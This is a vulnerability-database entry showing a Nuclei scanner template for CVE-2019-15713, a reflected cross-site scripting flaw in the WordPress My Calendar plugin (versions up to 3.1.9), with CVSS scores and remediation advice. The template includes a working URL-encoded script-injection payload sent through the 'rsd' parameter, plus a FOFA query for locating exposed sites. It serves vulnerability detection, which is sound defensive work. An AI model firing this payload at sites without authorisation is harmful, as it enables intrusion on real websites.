Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-15713
HistoryJul 15, 2021 - 5:09 p.m.

WordPress My Calendar <= 3.1.9 - Cross-Site Scripting

2021-07-1517:09:33
ProjectDiscovery
github.com
3
cve
cross-site scripting
wordpress
my calendar plugin
security vulnerability

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

41.8%

WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.

id: CVE-2019-15713

info:
  name: WordPress My Calendar <= 3.1.9 - Cross-Site Scripting
  author: daffainfo,dhiyaneshDk
  severity: medium
  description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update to the latest version of the My Calendar plugin (>= 3.1.10) or apply the vendor-provided patch to fix the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/9267
    - https://wordpress.org/plugins/my-calendar/#developers
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15713
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-15713
    cwe-id: CWE-79
    epss-score: 0.00101
    epss-percentile: 0.41606
    cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "my_calendar_project"
    product: "my_calendar"
    framework: wordpress
    fofa-query: "\"wordpress\" && body=\"wp-content/plugins/my-calendar\""
  tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,my_calendar_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'My Calendar'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402207ac831e6fd7d668e470992e243449de7a90933b03f28ac02c26a358c9919be5c022004a2d509cbd83cf9c5891e7d00d0304471bbac0709569f71936e27971c6ac358:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

41.8%

Related for NUCLEI:CVE-2019-15713